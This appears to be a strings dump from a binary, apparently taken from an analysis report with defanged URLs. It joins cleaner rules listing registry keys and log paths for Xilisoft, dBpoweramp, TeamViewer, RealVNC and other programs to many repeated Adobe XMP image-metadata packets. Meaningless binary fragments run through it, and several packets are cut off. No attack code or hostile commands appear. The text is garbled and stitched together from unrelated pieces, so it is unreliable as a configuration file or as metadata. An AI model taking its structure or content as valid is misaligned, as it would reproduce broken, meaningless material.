FileKey7=%LocalAppData%\Packages\*Facebook_*\AC\Microsoft\CryptnetUrlCache\MetaData|*.*
FileKey8=%LocalAppData%\Packages\*Facebook_*\AC\PRICache|*.*
FileKey9=%LocalAppData%\Packages\*Facebook_*\AC\Temp|*.*
RegKey1=Software\Xilisoft\Video Converter Platinum\Settings|last_output_dir
RegKey2=Software\Xilisoft\Video Converter Platinum\Settings|last_profile_group
RegKey3=Software\Xilisoft\Video Converter Platinum\Settings|last_profile_url
RegKey4=Software\Xilisoft\Video Converter Platinum\Settings|recent_profiles
RegKey5=Software\Xilisoft\Video Converter Platinum\Settings\output
Filekey1=%CommonAppData%\Xilisoft\Video Converter Platinum\customdata|settings.old
RegKey1=Software\Xilisoft\DVD Ripper Ultimate SE\Settings|last_output_dir
RegKey2=Software\Xilisoft\DVD Ripper Ultimate SE\Settings|last_profile_group
RegKey3=Software\Xilisoft\DVD Ripper Ultimate SE\Settings|last_profile_url
RegKey4=Software\Xilisoft\DVD Ripper Ultimate SE\Settings|recent_profiles
RegKey5=Software\Xilisoft\DVD Ripper Ultimate SE\Settings\output
FileKey1=%CommonAppData%\Xilisoft\DVD Ripper Ultimate SE\customdata|settings.old
RegKey1=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder0
RegKey2=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder1
RegKey3=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder2
RegKey4=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder3
RegKey5=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder4
RegKey6=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder5
RegKey7=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder6
RegKey8=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder7
RegKey9=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder8
RegKey10=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder9
RegKey11=HKCU\Software\Illustrate\dBpoweramp|dMCLastFolder10
RegKey12=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\AAC (Advanced Audio Compression)|DMCUserFolderStr
RegKey13=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\Aiff|DMCUserFolderStr
RegKey14=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\Apple Lossless|DMCUserFolderStr
RegKey15=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\FLAC|DMCUserFolderStr
RegKey16=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\mp3 (Lame)|DMCUserFolderStr
RegKey17=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\ogg vorbis|DMCUserFolderStr
RegKey18=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\Wave|DMCUserFolderStr
RegKey19=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\Windows Media Audio 10|DMCUserFolderStr
RegKey20=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\[Multi Encoder]|DMCUserFolderStr
RegKey21=HKCU\Software\Illustrate\dBpoweramp\dMCCodec\Test Conversion|DMCUserFolderStr
RegKey22=HKCU\Software\Illustrate\dBpoweramp|LastAccessedFolder
FileKey1=%LocalAppData%\2BrightSparks\SyncBackFree\Logs|*.*
FileKey2=%LocalAppData%\2BrightSparks\SyncBackFree|Debug*.txt
FileKey1=%ProgramFiles%\Wondershare Video Converter Pro\TempThumbDir|*.*|RECURSE
FileKey2=%ProgramFiles%\Wondershare Video Converter Pro\Log|*.*|RECURSE
FileKey3=%CommonAppData%\Wondershare Video Converter Pro|*.dat.bak
FileKey4=%CommonAppData%\Wondershare Video Converter Pro\TempSiteIconDir|*.*
FileKey5=%CommonAppData%\Wondershare Video Converter Pro\TempThumbDir|*.*
FileKey6=%CommonProgramFiles%\Wondershare\Wondershare Helper Compact\Temp|video*.exe
FileKey7=%ProgramFiles%\Wondershare\Video Converter Pro\Output|Thumbnail.dat
FileKey1=%ProgramFiles%\Aimersoft\Video Converter Ultimate\Log|*.*
FileKey2=%ProgramFiles%\Aimersoft\Video Converter Ultimate\Snapshot|snap*.dat
FileKey3=%ProgramFiles%\Common Files\Aimersoft\Aimersoft Helper Compact\log|*.*|RECURSE
FileKey4=%CommonAppData%\Aimersoft Video Converter Ultimate\TempSiteIconDir|*.*
FileKey5=%CommonAppData%\Aimersoft Video Converter Ultimate\TempThumbDir|*.*
FileKey6=%CommonAppData%\Aimersoft Video Converter Ultimate|*.dat.bak
FileKey7=%LocalAppData%\Aimersoft\ASHelper|*.exe.tmp
FileKey8=%AppData%\Aimersoft Video Converter Ultimate\Temp|*.*
RegKey1=HKCU\Software\Stardock\WindowBlinds\WB5.ini\Recent
FileKey1=%Public%\Documents\Stardock\WindowBlinds|StardockB*.dmp
RegKey1=HKCU\Software\Nitro\Pro\9.0\Recent File List
RegKey2=HKCU\Software\Nitro\Pro\9.0\Settings\Preferences\kPreferences|kCurrentOpenPath
FileKey1=%CommonProgramFiles%\Nitro\Pro\9.0|*.backup
FileKey2=%CommonAppData%\Package Cache|*.rsm
FileKey3=%AppData%\Downloaded Installations|*_temp.msi|RECURSE
FileKey4=%AppData%\Nitro\Pro\9.0|DocLog.txt
RegKey1=HKCU\Software\Nitro PDF\Reader\3.0\Recent File List
FileKey1=%Documents%\VirtualDJ\TrackListing|tracklist.txt
[Format Factory 3.3.5]
RegKey1=HKCU\Software\FreeTime\FormatFactory|LastUse
FileKey1=%Documents%\FormatFactory|*.task
RegKey1=HKCU\Software\TeamViewer\Version9|MRU
FileKey1=%ProgramFiles%\TeamViewer\*|*.tmp|RECURSE
FileKey2=%LocalAppData%\VirtualStore\Program Files*\TeamViewer\*|*.tmp|RECURSE
FileKey3=%ProgramFiles%\TeamViewer\Version9|Connections_incoming.txt
FileKey4=%AppData%\TeamViewer|Connections.txt
FileKey5=%AppData%\TeamViewer\MRU\RemoteSupport|*.tvc
FileKey1=%LocalAppData%\Microsoft\SkyDrive\logs|*.log;*.etl
RegKey1=HKCU\Software\RealVNC\vncviewer\MRU
FileKey1=%LocalAppData%\RealVNC|vncviewer.log
Detect=HKCU\Software\Softpointer\Tag&Rename3.7\Config
RegKey1=HKCU\Software\Softpointer\Tag&Rename3.7\Config|CurrentFolder
RegKey2=HKCU\Software\Softpointer\Tag&Rename3.7\Config|HistoryList
DetectFile=%ProgramFiles%\Tango\Tango.exe
FileKey1=%LocalAppData%\tango|call_log.dat
[PhotoScape 3.6.5]
FileKey1=%AppData%\PhotoScape|*.lst;*.cfg;*.jpg
FileKey1=%CommonAppData%\BlueStacks\logs|*.log;*.log.*|RECURSE
FileKey2=%LocalAppData%\BlueStacks\logs|*.log
FileKey3=%CommonAppData%\BlueStacksSetup\Images\|*.*|REMOVESELF
FileKey4=%CommonAppData%\BlueStacksSetup|runtimedata_*.zip;runtimedata_*.zip.manifest
FileKey5=%CommonAppData%\BlueStacksSetup|bstInstall.log
[ManyCam 4.0.109]
RegKey1=HKCU\Software\Visicom Media\ManyCam\ui|open_media_folder
RegKey2=HKCU\Software\Visicom Media\ManyCam\ui|open_audio_folder
RegKey3=HKCU\Software\Visicom Media\ManyCam\ui|open_game_folder
RegKey4=HKCU\Software\Visicom Media\ManyCam\ui|open_playlist_folder
FileKey1=%LocalAppData%\ManyCam\game_capture|*.log
FileKey1=%AppData%\XnView|XnView.db;category.bak
FileKey2=%ProgramFiles%\XnView|category.bak
FileKey3=%LocalAppData%\VirtualStore\Program Files*\XnView|category.bak
FileKey4=%ProgramFiles%\XnView\cache|*.db
FileKey5=%LocalAppData%\VirtualStore\Program Files*\XnView\cache|*.dbPAD
iTXtXML:com.adobe.xmp
<rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/"
xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#">
<xmpMM:DocumentID>xmp.did:28A922183F0711E38F8FAFE700EDB4A3</xmpMM:DocumentID>
<xmpMM:InstanceID>xmp.iid:28A922173F0711E38F8FAFE700EDB4A3</xmpMM:InstanceID>
<stRef:instanceID>xmp.iid:5A7F3BB73EFB11E38F8FAFE700EDB4A3</stRef:instanceID>
<stRef:documentID>xmp.did:5A7F3BB83EFB11E38F8FAFE700EDB4A3</stRef:documentID>
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/">
<xmp:CreatorTool>Adobe Fireworks CS6 (Windows)</xmp:CreatorTool>
xmlns:dc="hXXp://purl.org/dc/elements/1.1/">
...aLp
1.sHwR
.XJG]
Op.Qt
<xmpMM:DocumentID>xmp.did:28A922103F0711E38F8FAFE700EDB4A3</xmpMM:DocumentID>
<xmpMM:InstanceID>xmp.iid:28A9220F3F0711E38F8FAFE700EDB4A3</xmpMM:InstanceID>
<stRef:instanceID>xmp.iid:390E359A3EFB11E38F8FAFE700EDB4A3</stRef:instanceID>
<stRef:documentID>xmp.did:390E359B3EFB11E38F8FAFE700EDB4A3</stRef:documentID>
S%szM
Op.Rt
<xmpMM:DocumentID>xmp.did:0B4F6D4D3F0711E38F8FAFE700EDB4A3</xmpMM:DocumentID>
<xmpMM:InstanceID>xmp.iid:0B4F6D4C3F0711E38F8FAFE700EDB4A3</xmpMM:InstanceID>
<stRef:instanceID>xmp.iid:390E359E3EFB11E38F8FAFE700EDB4A3</stRef:instanceID>
<stRef:documentID>xmp.did:390E359F3EFB11E38F8FAFE700EDB4A3</stRef:documentID>
Z.VxU
#iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:5F784EA83F0A11E38F8FAFE700EDB4A3" xmpMM:DocumentID="xmp.did:5F784EA93F0A11E38F8FAFE700EDB4A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5F784EA63F0A11E38F8FAFE700EDB4A3" stRef:documentID="xmp.did:5F784EA73F0A11E38F8FAFE700EDB4A3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:5F784EB03F0A11E38F8FAFE700EDB4A3" xmpMM:DocumentID="xmp.did:8698DEF63F0A11E38F8FAFE700EDB4A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:5F784EAE3F0A11E38F8FAFE700EDB4A3" stRef:documentID="xmp.did:5F784EAF3F0A11E38F8FAFE700EDB4A3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:8698DEF93F0A11E38F8FAFE700EDB4A3" xmpMM:DocumentID="xmp.did:8698DEFA3F0A11E38F8FAFE700EDB4A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8698DEF73F0A11E38F8FAFE700EDB4A3" stRef:documentID="xmp.did:8698DEF83F0A11E38F8FAFE700EDB4A3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:0C5A5A573F0A11E38F8FAFE700EDB4A3" xmpMM:DocumentID="xmp.did:0C5A5A583F0A11E38F8FAFE700EDB4A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0C5A5A553F0A11E38F8FAFE700EDB4A3" stRef:documentID="xmp.did:0C5A5A563F0A11E38F8FAFE700EDB4A3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>h
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:0C5A5A5B3F0A11E38F8FAFE700EDB4A3" xmpMM:DocumentID="xmp.did:0C5A5A5C3F0A11E38F8FAFE700EDB4A3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:0C5A5A593F0A11E38F8FAFE700EDB4A3" stRef:documentID="xmp.did:0C5A5A5A3F0A11E38F8FAFE700EDB4A3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:37A6DD0B59D211E3B480CA143DA2067E" xmpMM:InstanceID="xmp.iid:37A6DD0A59D211E3B480CA143DA2067E" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:379CFF6C3F0811E38F8FAFE700EDB4A3" stRef:documentID="xmp.did:379CFF6D3F0811E38F8FAFE700EDB4A3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>7<
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:37A6DD0F59D211E3B480CA143DA2067E" xmpMM:InstanceID="xmp.iid:37A6DD0E59D211E3B480CA143DA2067E" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:379CFF6C3F0811E38F8FAFE700EDB4A3" stRef:documentID="xmp.did:379CFF6D3F0811E38F8FAFE700EDB4A3"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
%sgqP
%F@$M=
fz@A%d
wAA%d FX
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:041241FC59D311E3B480CA143DA2067E" xmpMM:InstanceID="xmp.iid:041241FB59D311E3B480CA143DA2067E" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A41B2BE9512911E388F8DACD957AC223" stRef:documentID="xmp.did:A41B2BEA512911E388F8DACD957AC223"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
>4iTXtXML:com.adobe.xmp
xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/"
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#"
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/"
xmlns:dc="hXXp://purl.org/dc/elements/1.1/"
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/"
xmlns:exif="hXXp://ns.adobe.com/exif/1.0/">
<xmpMM:InstanceID>xmp.iid:1ad7f5fb-1fea-47e3-8672-4df8fccbe873</xmpMM:InstanceID>
<xmpMM:DocumentID>xmp.did:9650ad9a-595e-4aef-a700-e61a1555eb75</xmpMM:DocumentID>
<xmpMM:OriginalDocumentID>xmp.did:9650ad9a-595e-4aef-a700-e61a1555eb75</xmpMM:OriginalDocumentID>
<stEvt:instanceID>xmp.iid:9650ad9a-595e-4aef-a700-e61a1555eb75</stEvt:instanceID>
<stEvt:instanceID>xmp.iid:1ad7f5fb-1fea-47e3-8672-4df8fccbe873</stEvt:instanceID>
<rdf:li>xmp.did:0E753C0943E211E385E7F142D3A1E9AE</rdf:li>
<rdf:li>xmp.did:1DABCF67A121E011A8E3A4524235D152</rdf:li>
<rdf:li>xmp.did:561349AE3C22681192B0C17F583FCC1A</rdf:li>
<rdf:li>xmp.did:F77F117407206811871FC0E6839F738D</rdf:li>
<xmpMM:InstanceID>xmp.iid:8e86e6e6-d17e-4edd-a787-48ce96a864ae</xmpMM:InstanceID>
<xmpMM:DocumentID>xmp.did:31684700-c79c-4ecb-bf48-2c417443446c</xmpMM:DocumentID>
<xmpMM:OriginalDocumentID>xmp.did:31684700-c79c-4ecb-bf48-2c417443446c</xmpMM:OriginalDocumentID>
<stEvt:instanceID>xmp.iid:31684700-c79c-4ecb-bf48-2c417443446c</stEvt:instanceID>
<stEvt:instanceID>xmp.iid:8e86e6e6-d17e-4edd-a787-48ce96a864ae</stEvt:instanceID>
Ge%u.
u!.nU
<4iTXtXML:com.adobe.xmp
xmlns:stEvt="hXXp://ns.adobe.com/xap/1.0/sType/ResourceEvent#">
<xmpMM:InstanceID>xmp.iid:79e8ed31-8283-4b65-9503-d61c79f74565</xmpMM:InstanceID>
<xmpMM:DocumentID>xmp.did:2164bd4e-5b81-4ff4-b6a0-a2c08a80dd7f</xmpMM:DocumentID>
<xmpMM:OriginalDocumentID>xmp.did:2164bd4e-5b81-4ff4-b6a0-a2c08a80dd7f</xmpMM:OriginalDocumentID>
<stEvt:instanceID>xmp.iid:2164bd4e-5b81-4ff4-b6a0-a2c08a80dd7f</stEvt:instanceID>
<stEvt:instanceID>xmp.iid:79e8ed31-8283-4b65-9503-d61c79f74565</stEvt:instanceID>
xmlns:photoshop="hXXp://ns.adobe.com/photoshop/1.0/">
xmlns:tiff="hXXp://ns.adobe.com/tiff/1.0/">
MMMH%S
<xmpMM:InstanceID>xmp.iid:30c8d357-ba5b-4582-95d6-d72aad0dfaf3</xmpMM:InstanceID>
<xmpMM:DocumentID>xmp.did:fb59d17c-d3ce-4a32-a161-792f94e2b95d</xmpMM:DocumentID>
<xmpMM:OriginalDocumentID>xmp.did:fb59d17c-d3ce-4a32-a161-792f94e2b95d</xmpMM:OriginalDocumentID>
<stEvt:instanceID>xmp.iid:fb59d17c-d3ce-4a32-a161-792f94e2b95d</stEvt:instanceID>
<stEvt:instanceID>xmp.iid:30c8d357-ba5b-4582-95d6-d72aad0dfaf3</stEvt:instanceID>
<xmpMM:InstanceID>xmp.iid:015baab2-3a69-4ba6-8c12-a06f047936b0</xmpMM:InstanceID>
<xmpMM:DocumentID>xmp.did:cb6b1462-e068-4ec7-ad39-b2982b26edbb</xmpMM:DocumentID>
<xmpMM:OriginalDocumentID>xmp.did:cb6b1462-e068-4ec7-ad39-b2982b26edbb</xmpMM:OriginalDocumentID>
<stEvt:instanceID>xmp.iid:cb6b1462-e068-4ec7-ad39-b2982b26edbb</stEvt:instanceID>
<stEvt:instanceID>xmp.iid:015baab2-3a69-4ba6-8c12-a06f047936b0</stEvt:instanceID>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:2FAE4BC9B76611E3A46ACF62640822E9" xmpMM:DocumentID="xmp.did:2FAE4BCAB76611E3A46ACF62640822E9"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2FAE4BC7B76611E3A46ACF62640822E9" stRef:documentID="xmp.did:2FAE4BC8B76611E3A46ACF62640822E9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:F9B30FAEC95B11E3AA5D9C6F1C42E378" xmpMM:DocumentID="xmp.did:F9B30FAFC95B11E3AA5D9C6F1C42E378"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:F9B30FACC95B11E3AA5D9C6F1C42E378" stRef:documentID="xmp.did:F9B30FADC95B11E3AA5D9C6F1C42E378"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="True" xmpMM:OriginalDocumentID="xmp.did:efc10bd1-b45e-410e-9f20-62717a668c04" xmpMM:DocumentID="xmp.did:3DDC6B2C4CB911E484FBDFB6F988B028" xmpMM:InstanceID="xmp.iid:3DDC6B2B4CB911E484FBDFB6F988B028" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8fa004f6-f760-49c2-8bc2-b10912d7553e" stRef:documentID="adobe:docid:photoshop:f67adfe6-93a8-1177-929d-81d389b8f969"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>}6d
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="True" xmpMM:OriginalDocumentID="xmp.did:efc10bd1-b45e-410e-9f20-62717a668c04" xmpMM:DocumentID="xmp.did:3DDC6B344CB911E484FBDFB6F988B028" xmpMM:InstanceID="xmp.iid:3DDC6B334CB911E484FBDFB6F988B028" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8fa004f6-f760-49c2-8bc2-b10912d7553e" stRef:documentID="adobe:docid:photoshop:f67adfe6-93a8-1177-929d-81d389b8f969"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c014 79.156797, 2014/08/20-09:53:02 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="hXXp://ns.adobe.com/xap/1.0/rights/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpRights:Marked="True" xmpMM:OriginalDocumentID="xmp.did:efc10bd1-b45e-410e-9f20-62717a668c04" xmpMM:DocumentID="xmp.did:3DDC6B304CB911E484FBDFB6F988B028" xmpMM:InstanceID="xmp.iid:3DDC6B2F4CB911E484FBDFB6F988B028" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8fa004f6-f760-49c2-8bc2-b10912d7553e" stRef:documentID="adobe:docid:photoshop:f67adfe6-93a8-1177-929d-81d389b8f969"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.154911, 2013/10/29-11:47:16 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Macintosh)" xmpMM:InstanceID="xmp.iid:55498DF2BC1D11E3A70EAAA1837B71AE" xmpMM:DocumentID="xmp.did:55498DF3BC1D11E3A70EAAA1837B71AE"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:55498DF0BC1D11E3A70EAAA1837B71AE" stRef:documentID="xmp.did:55498DF1BC1D11E3A70EAAA1837B71AE"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
